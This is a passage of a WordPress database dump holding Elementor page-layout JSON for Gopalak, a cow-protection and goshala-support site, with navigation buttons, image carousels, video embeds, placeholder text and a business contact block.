:{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10271,1716,'_elementor_page_assets','a:0:{}'),(10273,1717,'_elementor_edit_mode','builder'),(10274,1717,'_elementor_template_type','wp-page'),(10275,1717,'_elementor_version','3.7.8'),(10276,1717,'_wp_page_template','elementor_canvas'),(10277,1717,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: 